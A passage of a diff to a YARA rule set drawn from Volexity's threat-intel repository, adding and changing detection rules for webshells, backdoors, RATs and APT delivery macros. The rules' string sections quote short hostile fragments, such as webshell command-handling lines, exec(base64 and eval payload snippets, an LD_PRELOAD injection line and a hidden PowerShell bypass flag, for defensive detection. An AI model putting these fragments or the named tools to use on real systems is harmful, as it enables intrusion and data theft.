+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 8534
+		version = 3
+
+	strings:
+		$reg = "Software\\Bitcoin\\Bitcoin-Qt"
+		$pattern = "%s=%d&%s=%s&%s=%s&%s=%d"
+		$exec = " \"%s\", RaitingSetupUI "
+		$http = "Accept: */*" wide
+
+	condition:
+		all of them
+}
+rule VOLEXITY_Apt_Delivery_Macro_Lazypine_Jeus_B : LAZYPINE FILE
+{
+	meta:
+		description = "Detects macros used by the LazyPine threat actor to distribute AppleJeus."
+		author = "threatintel@volexity.com"
+		id = "ac4d4e82-e29f-5134-999d-b8dcef59d285"
+		date = "2022-11-03"
+		modified = "2025-05-21"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L114-L139"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "e55199e6ad26894f98e930cd4716127ee868872d08ada1c44675e4db1ec27894"
+		score = 75
+		quality = 80
+		tags = "LAZYPINE, FILE"
+		hash1 = "17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b"
+		os = "win"
+		os_arch = "all"
+		scan_context = "file"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 8493
+		version = 3
+
+	strings:
+		$a1 = ", vbDirectory) = \"\" Then" ascii
+		$a2 = ".Caption & " ascii
+		$a3 = ".nodeTypedValue" ascii
+		$a4 = ".Application.Visible = False" ascii
+		$a5 = " MkDir (" ascii
+
+	condition:
+		all of ( $a* )
+}
+rule VOLEXITY_Apt_Delivery_Office_Macro_Lazypine_Jeus : LAZYPINE FILE
+{
+	meta:
+		description = "Detects malicious documents used by LazyPine in a campaign dropping the AppleJeus malware."
+		author = "threatintel@volexity.com"
+		id = "f9a92f47-aa1d-56ea-ac59-47cc559f379f"
+		date = "2022-11-02"
+		modified = "2025-05-21"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L141-L165"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "54d5396b889a45d81122301eadf77f73135937fbe9647ad60491ac7856faf5ad"
+		score = 75
+		quality = 80
+		tags = "LAZYPINE, FILE"
+		hash1 = "17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b"
+		os = "all"
+		os_arch = "all"
+		scan_context = "file"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 8490
+		version = 7
+
+	strings:
+		$s1 = "0M8R4K" ascii
+		$s2 = "bin.base64" ascii
+		$s3 = "dragon" ascii
+		$s4 = "Workbook_Open" ascii
+
+	condition:
+		all of ( $s* )
+}
+rule VOLEXITY_Webshell_Java_Behinder_Shellservice : FILE MEMORY
+{
+	meta:
+		description = "Looks for artifacts generated (generally seen in .class files) related to the Behinder webshell."
+		author = "threatintel@volexity.com"
+		id = "21c1e3e9-d048-5c60-9c21-8e54b27f359a"
+		date = "2022-03-18"
+		modified = "2024-07-30"
+		reference = "https://github.com/MountCloud/BehinderClientSource/blob/master/src/main/java/net/rebeyond/behinder/core/ShellService.java"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L1-L29"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "373a8d4ef81e9bbbf1f24ebf0389e7da4b73f88786cc8e1d286ccc9f4c36debc"
+		score = 75
+		quality = 30
+		tags = "FILE, MEMORY"
+		hash1 = "9a9882f9082a506ed0fc4ddaedd50570c5762deadcaf789ac81ecdbb8cf6eff2"
+		os = "win,linux"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 6615
+		version = 3
+
+	strings:
+		$s1 = "CONNECT" ascii fullword
+		$s2 = "DISCONNECT" ascii fullword
+		$s3 = "socket_" ascii fullword
+		$s4 = "targetIP" ascii fullword
+		$s5 = "targetPort" ascii fullword
+		$s6 = "socketHash" ascii fullword
+		$s7 = "extraData" ascii fullword
+
+	condition:
+		all of them
+}
+rule VOLEXITY_Malware_Golang_Pantegana : FILE MEMORY
+{
+	meta:
+		description = "Detects PANTEGANA, a Golang backdoor used by a range of threat actors due to its public availability."
+		author = "threatintel@volexity.com"
+		id = "b6154165-68e0-5986-a0cf-5631d369c230"
+		date = "2022-03-30"
+		modified = "2025-03-21"
+		reference = "https://github.com/elleven11/pantegana"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L90-L120"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "791a664a6b4b98051cbfacb451099de085cbab74d73771709377ab68a5a23d2b"
+		score = 75
+		quality = 80
+		tags = "FILE, MEMORY"
+		hash1 = "8297c99391aae918f154077c61ea94a99c7a339166e7981d9912b7fdc2e0d4f0"
+		os = "all"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "high"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 6631
+		version = 3
+
+	strings:
+		$s1 = "RunFingerprinter" ascii
+		$s2 = "SendSysInfo" ascii
+		$s3 = "ExecAndGetOutput" ascii
+		$s4 = "RequestCommand" ascii
+		$s5 = "bindataRead" ascii
+		$s6 = "RunClient" ascii
+		$magic = "github.com/elleven11/pantegana" ascii
+
+	condition:
+		5 of ( $s* ) or $magic
+}
+rule VOLEXITY_Malware_Any_Pupyrat_B : FILE MEMORY
+{
+	meta:
+		description = "Detects the PUPYRAT malware family, a cross-platform RAT written in Python."
+		author = "threatintel@volexity.com"
+		id = "ec8d0448-f47d-5c6e-bcf9-8f40ae83a96f"
+		date = "2022-04-07"
+		modified = "2025-03-21"
+		reference = "https://github.com/n1nj4sec/pupy"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L121-L158"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "f5b5f35ee783ff1163072591c6d48a85894729156935650a0fd166ae22a2ea00"
+		score = 75
+		quality = 80
+		tags = "FILE, MEMORY"
+		hash1 = "7474a6008b99e45686678f216af7d6357bb70a054c6d9b05e1817c8d80d536b4"
+		os = "all"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 6689
+		version = 4
+
+	strings:
+		$elf1 = "LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null" ascii
+		$elf2 = "reflective_inject_dll" fullword ascii
+		$elf3 = "ld_preload_inject_dll" fullword ascii
+		$pupy1 = "_pupy.error" ascii
+		$pupy2 = "pupy://" ascii
+		$s1 = "Args not passed" ascii
+		$s2 = "Too many args" ascii
+		$s3 = "Can't execute" ascii
+		$s4 = "mexec:stdin" ascii
+		$s5 = "mexec:stdout" ascii
+		$s6 = "mexec:stderr" ascii
+		$s7 = "LZMA error" ascii
+
+	condition:
+		any of ( $elf* ) or all of ( $pupy* ) or all of ( $s* )
+}
+rule VOLEXITY_Susp_Php_Fileinput_Eval : FILE
+{
+	meta:
+		description = "Rule designed to detect PHP files which use file_get_contents() and then shortly afterwards use an eval statement."
+		author = "threatintel@volexity.com"
+		id = "3e311677-22ea-5e5f-bdc6-dd67033d25a6"
+		date = "2021-06-16"
+		modified = "2024-12-12"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L159-L182"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "de376bfdfa5b6244c414454cb5d43d29e3dd75e049389f0c430c160f9d198965"
+		score = 65
+		quality = 80
 		tags = "FILE"
-		sharing = "TLP:WHITE"
-		hash_1 = "c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5"
-		in_memory = "True"
+		hash1 = "1a34c43611ee310c16acc383c10a7b8b41578c19ee85716b14ac5adbf0a13bd5"
+		hash2 = "6e8874c756c009c63f715a44ca72d0cb31dc25d87d7df6ca2830fe8330580342"
+		os = "win,linux"
+		os_arch = "all"
+		scan_context = "file"
+		severity = "high"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 5581
+		version = 5
+
+	strings:
+		$s1 = "file_get_contents(\"php://input\")"
+		$s2 = "eval("
+
+	condition:
+		$s2 in ( @s1 [ 1 ] .. ( @s1 [ 1 ] + 512 ) )
+}
+rule VOLEXITY_Susp_Php_Call_User_Func : FILE
+{
+	meta:
+		description = "Webshells using call_user_func() function against an object from a file input or POST variable."
+		author = "threatintel@volexity.com"
+		id = "48c7857e-7dda-5e3f-b82c-7d34c251f083"
+		date = "2021-06-16"
+		modified = "2024-07-30"
+		reference = "https://zhuanlan.zhihu.com/p/354906657"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L183-L205"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "46c999da97682023861e58f9cd2c8651480db990a0361c1985c6d5c35b5bf0ea"
+		score = 65
+		quality = 80
+		tags = "FILE"
+		hash1 = "40b053a2f3c8f47d252b960a9807b030b463ef793228b1670eda89f07b55b252"
+		os = "win,linux"
+		os_arch = "all"
+		scan_context = "file"
+		severity = "high"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 5582
+		version = 4
+
+	strings:
+		$s1 = "@call_user_func(new C()" wide ascii
+
+	condition:
+		$s1
+}
+rule VOLEXITY_Apt_Malware_Js_Sharpext : SHARPPINE FILE MEMORY
+{
+	meta:
+		description = "A malicious Chrome browser extension used by the SharpPine threat actor to steal Gmail data from a victim."
+		author = "threatintel@volexity.com"
+		id = "61b5176a-ff73-5fce-bc70-c9e09bb5afed"
+		date = "2021-09-14"
+		modified = "2025-05-21"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-07-28 SharpTongue SharpTongue Deploys Clever Mail-Stealing Browser Extension SHARPEXT/yara.yar#L1-L52"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "0ed58c8646582ee36aeac650fac02d1e4962d45c0f6a24783c021d9267bed192"
+		score = 75
+		quality = 80
+		tags = "SHARPPINE, FILE, MEMORY"
+		hash1 = "1c9664513fe226beb53268b58b11dacc35b80a12c50c22b76382304badf4eb00"
+		hash2 = "6025c66c2eaae30c0349731beb8a95f8a5ba1180c5481e9a49d474f4e1bb76a4"
+		hash3 = "6594b75939bcdab4253172f0fa9066c8aee2fa4911bd5a03421aeb7edcd9c90c"
+		os = "all"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 5916
+		version = 5
+
+	strings:
+		$s1 = "\"mode=attach&name=\"" ascii
+		$s2 = "\"mode=new&mid=\"" ascii
+		$s3 = "\"mode=attlist\"" ascii
+		$s4 = "\"mode=list\"" ascii
+		$s5 = "\"mode=domain\"" ascii
+		$s6 = "\"mode=black\"" ascii
+		$s7 = "\"mode=newD&d=\"" ascii
+		$mark1 = "chrome.runtime.onMessage.addListener" ascii
+		$mark2 = "chrome.webNavigation.onCompleted.addListener" ascii
+		$enc1 = "function BSue(string){" ascii
+		$enc2 = "function BSE(input){" ascii
+		$enc3 = "function bin2hex(byteArray)" ascii
+		$xhr1 = ".send(\"mode=cd1" ascii
+		$xhr2 = ".send(\"mode=black" ascii
+		$xhr3 = ".send(\"mode=domain" ascii
+		$xhr4 = ".send(\"mode=list" ascii
+		$manifest1 = "\"description\":\"advanced font\"," ascii
+		$manifest2 = "\"scripts\":[\"bg.js\"]" ascii
+		$manifest3 = "\"devtools_page\":\"dev.html\"" ascii
+
+	condition:
+		(5 of ( $s* ) and all of ( $mark* ) ) or all of ( $enc* ) or 3 of ( $xhr* ) or 2 of ( $manifest* )
+}
+rule VOLEXITY_Apt_Webshell_Pl_Complyshell : UTA0178 FILE MEMORY
+{
+	meta:
+		description = "Detection for the COMPLYSHELL webshell."
+		author = "threatintel@volexity.com"
+		id = "6b44b5bc-a75f-573c-b9c3-562b7874e408"
+		date = "2023-12-13"
+		modified = "2024-01-12"
+		reference = "TIB-20231215"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L3-L25"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "ff46691f1add20cff30fe996e2fb199ce42408e86d5642a8a43c430f2245b1f5"
+		score = 75
+		quality = 80
+		tags = "UTA0178, FILE, MEMORY"
+		hash1 = "8bc8f4da98ee05c9d403d2cb76097818de0b524d90bea8ed846615e42cb031d2"
+		os = "linux"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 9995
+		version = 4
 
 	strings:
-		$sx1 = "-WindowStyle Hidden -ep bypass -file" ascii
-		$sx2 = "BEGINDATA" ascii
-		$sx3 = "GET %s HTTP/1.0" ascii
-		$s5 = "User-Agent:" ascii
-		$s8 = "ALLUSERSPROFILE" ascii
+		$s = "eval{my $c=Crypt::RC4->new("
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 2 of ( $sx* ) ) or all of them
+		$s
 }
-/*
- * YARA Rule Set
- * Repository Name: Volexity
- * Repository: https://github.com/volexity/threat-intel
- * Retrieval Date: 2026-02-22
- * Git Commit: 92353b1ccc638f5ed0e7db43a26cb40fad7f03df
- * Number of Rules: 86
- * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
- *
- *
- * LICENSE
- *
- * Copyright 2022 by Volexity, Inc.
-
-The 2-Clause BSD License
-
-Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
-1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
-2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
- */
-rule VOLEXITY_Apt_Malware_Py_Upstyle : UTA0218 FILE MEMORY
+rule VOLEXITY_Apt_Webshell_Aspx_Glasstoken : UTA0178 FILE MEMORY
 {
 	meta:
-		description = "Detect the UPSTYLE webshell."
+		description = "Detection for a custom webshell seen on Exchange server. The webshell contains two functions, the first is to act as a Tunnel, using code borrowed from reGeorg, the second is custom code to execute arbitrary .NET code."
 		author = "threatintel@volexity.com"
-		id = "45726f35-8b3e-5095-b145-9e7f6da6838b"
-		date = "2024-04-11"
-		modified = "2024-04-12"
-		reference = "TIB-20240412"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L1-L34"
+		id = "2f07748a-a52f-5ac7-9d3e-50fd3ecea271"
+		date = "2023-12-12"
+		modified = "2024-09-30"
+		reference = "TIB-20231215"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L26-L52"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "51923600b23d23f4ce29eac7f5ab9f7e1ddb45bed5f6727ddec4dcb75872e473"
+		logic_hash = "6b8183ac1e87a86c58760db51f767ed278cc0c838ed89e7435af7d0373e58b26"
 		score = 75
-		quality = 80
-		tags = "UTA0218, FILE, MEMORY"
-		hash1 = "3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac"
-		hash2 = "0d59d7bddac6c22230187ef6cf7fa22bca93759edc6f9127c41dc28a2cea19d8"
-		hash3 = "4dd4bd027f060f325bf6a90d01bfcf4e7751a3775ad0246beacc6eb2bad5ec6f"
-		os = "linux"
+		quality = 55
+		tags = "UTA0178, FILE, MEMORY"
+		hash1 = "26cbb54b1feb75fe008e36285334d747428f80aacdb57badf294e597f3e9430d"
+		os = "win"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10429
-		version = 2
+		rule_id = 9994
+		version = 6
 
 	strings:
-		$stage1_str1 = "/opt/pancfg/mgmt/licenses/PA_VM"
-		$stage1_str2 = "exec(base64."
-		$stage2_str1 = "signal.signal(signal.SIGTERM,stop)"
-		$stage2_str2 = "exec(base64."
-		$stage3_str1 = "write(\"/*\"+output+\"*/\")"
-		$stage3_str2 = "SHELL_PATTERN"
+		$s1 = "=Convert.FromBase64String(System.Text.Encoding.Default.GetString(" ascii
+		$re = /Assembly\.Load\(errors\)\.CreateInstance\("[a-z0-9A-Z]{4,12}"\).GetHashCode\(\);/
 
 	condition:
-		all of ( $stage1* ) or all of ( $stage2* ) or all of ( $stage3* )
+		for any i in ( 0 .. math.min ( #s1 , 100 ) ) : ( $re in ( @s1 [ i ] .. @s1 [ i ] + 512 ) )
 }
-rule VOLEXITY_Susp_Any_Jarischf_User_Path : FILE MEMORY
+rule VOLEXITY_Webshell_Aspx_Regeorg : FILE MEMORY
 {
 	meta:
-		description = "Detects paths embedded in samples in released projects written by Ferdinand Jarisch, a pentester in AISEC. These tools are sometimes used by attackers in real world intrusions."
+		description = "Detects the reGeorg webshell based on common strings in the webshell. May also detect other webshells which borrow code from ReGeorg."
 		author = "threatintel@volexity.com"
-		id = "062a6fdb-c516-5643-9c7c-deff32eeb95e"
-		date = "2024-04-10"
-		modified = "2024-04-15"
-		reference = "TIB-20240412"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L59-L81"
+		id = "02365a30-769e-5c47-8d36-a79608ffd121"
+		date = "2018-08-29"
+		modified = "2024-01-09"
+		reference = "TIB-20231215"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L53-L86"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "574d5b1fadb91c39251600e7d73d4993d4b16565bd1427a0e8d6ed4e7905ab54"
-		score = 50
+		hash = "9d901f1a494ffa98d967ee6ee30a46402c12a807ce425d5f51252eb69941d988"
+		logic_hash = "4fed023e85a32052917f6db1e2e155c91586538938c03acc59f200a8264888ca"
+		score = 75
 		quality = 80
 		tags = "FILE, MEMORY"
-		hash1 = "161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6"
-		os = "all"
+		os = "win"
 		os_arch = "all"
 		scan_context = "file,memory"
-		severity = "high"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10424
-		version = 4
+		rule_id = 410
+		version = 7
 
 	strings:
-		$proj_1 = "/home/jarischf/"
+		$a1 = "every office needs a tool like Georg" ascii
+		$a2 = "cmd = Request.QueryString.Get(\"cmd\")" ascii
+		$a3 = "exKak.Message" ascii
+		$proxy1 = "if (rkey != \"Content-Length\" && rkey != \"Transfer-Encoding\")"
+		$proxy_b1 = "StreamReader repBody = new StreamReader(response.GetResponseStream(), Encoding.GetEncoding(\"UTF-8\"));" ascii
+		$proxy_b2 = "string rbody = repBody.ReadToEnd();" ascii
+		$proxy_b3 = "Response.AddHeader(\"Content-Length\", rbody.Length.ToString());" ascii
 
 	condition:
-		any of ( $proj_* )
+		any of ( $a* ) or $proxy1 or all of ( $proxy_b* )
 }
-rule VOLEXITY_Hacktool_Golang_Reversessh_Fahrj : FILE MEMORY
+rule VOLEXITY_Hacktool_Py_Pysoxy : FILE MEMORY
 {
 	meta:
-		description = "Detects a reverse SSH utility available on GitHub. Attackers may use this tool or similar tools in post-exploitation activity."
+		description = "SOCKS5 proxy tool used to relay connections."
 		author = "threatintel@volexity.com"
-		id = "332e323f-cb16-5aa2-8b66-f3d6d50d94f2"
-		date = "2024-04-10"
-		modified = "2024-04-12"
-		reference = "TIB-20240412"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L82-L116"
+		id = "88094b55-784d-5245-9c40-b1eebf0e6e72"
+		date = "2024-01-09"
+		modified = "2024-01-09"
+		reference = "TIB-20240109"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L87-L114"
 		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "38b40cc7fc1e601da2c7a825f1c2eff209093875a5829ddd2f4c5ad438d660f8"
+		logic_hash = "f73e9d3c2f64c013218469209f3b69fc868efafc151a7de979dde089bfdb24b2"
 		score = 75
 		quality = 80
 		tags = "FILE, MEMORY"
-		hash1 = "161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6"
+		hash1 = "e192932d834292478c9b1032543c53edfc2b252fdf7e27e4c438f4b249544eeb"
 		os = "all"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10423
-		version = 5
+		rule_id = 10065
+		version = 3
 
 	strings:
-		$fun_1 = "createLocalPortForwardingCallback"
-		$fun_2 = "createReversePortForwardingCallback"
-		$fun_3 = "createPasswordHandler"
-		$fun_4 = "createPublicKeyHandler"
-		$fun_5 = "createSFTPHandler"
-		$fun_6 = "dialHomeAndListen"
-		$fun_7 = "createExtraInfoHandler"
-		$fun_8 = "createSSHSessionHandler"
-		$fun_9 = "createReversePortForwardingCallback"
-		$proj_1 = "github.com/Fahrj/reverse-ssh"
+		$s1 = "proxy_loop" ascii
+		$s2 = "connect_to_dst" ascii
+		$s3 = "request_client" ascii
+		$s4 = "subnegotiation_client" ascii
+		$s5 = "bind_port" ascii
 
 	condition:
-		any of ( $proj_* ) or 4 of ( $fun_* )
+		all of them
 }
 rule VOLEXITY_Apt_Malware_Vbs_Basicstar_A : CHARMINGCYPRESS FILE MEMORY
 {
@@ -161990,340 +162640,144 @@ rule VOLEXITY_Apt_Malware_Ps1_Powerstar_Generic : CHARMINGCYPRESS FILE MEMORY
 	condition:
 		all of ( $http* ) or all of ( $json* )
 }
-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Modules : TRANSPARENTJASMINE FILE MEMORY
-{
-	meta:
-		description = "Detects DISGOMOJI modules using strings in the ELF."
-		author = "threatintel@volexity.com"
-		id = "b9e4ecdc-9b02-546f-9b79-947cb6b1f99a"
-		date = "2024-02-22"
-		modified = "2024-07-05"
-		reference = "TIB-20240229"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L1-L24"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "7880288e3230b688b780bdfbac2b0761fd7831b7df233672c2242c21a86e1297"
-		score = 75
-		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
-		hash1 = "2abaae4f6794131108adf5b42e09ee5ce24769431a0e154feabe6052cfe70bf3"
-		os = "linux"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10270
-		version = 6
-
-	strings:
-		$s1 = "discord-c2/test/main/finalizing/Deliveries/ob_Delivery.go" wide ascii
-		$s2 = "discord-c2/test/main/finalizing/WAN_Conf.go" wide ascii
-
-	condition:
-		any of them
-}
-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Loader : TRANSPARENTJASMINE FILE MEMORY
-{
-	meta:
-		description = "Detects DISGOMOJI loader using strings in the ELF."
-		author = "threatintel@volexity.com"
-		id = "6d7848db-f1a5-5ccc-977a-7597b966a31c"
-		date = "2024-02-22"
-		modified = "2024-07-05"
-		reference = "TIB-20240229"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L25-L47"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "d9be4846bab5fffcfd60eaec377443819404f30ec088905c2ee26bd3b7525832"
-		score = 75
-		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
-		hash1 = "51a372fee89f885741515fa6fdf0ebce860f98145c9883f2e3e35c0fe4432885"
-		os = "linux"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10269
-		version = 7
-
-	strings:
-		$s1 = "discord-c2/test/main/delievery.go" wide ascii
-
-	condition:
-		$s1
-}
-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Debug_String : TRANSPARENTJASMINE FILE MEMORY
-{
-	meta:
-		description = "Detects DISGOMOJI using strings in the ELF."
-		author = "threatintel@volexity.com"
-		id = "eed2468f-7e50-5f3e-946a-277c10984823"
-		date = "2024-02-22"
-		modified = "2024-11-27"
-		reference = "TIB-20240229"
-		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L48-L71"
-		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
-		logic_hash = "6bb130eead39bd8128983e0f2e76cfeff8865ce8ed3cb73b132ed32d68fc0db0"
-		score = 75
-		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
-		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
-		os = "linux"
-		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
-		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10268
-		version = 9
-
-	strings:
-		$s1 = "discord-c2/test/main/payload.go" wide ascii
-		$s2 = "Desktop/Golang_Dev/Discord"
-
-	condition:
-		any of them
-}
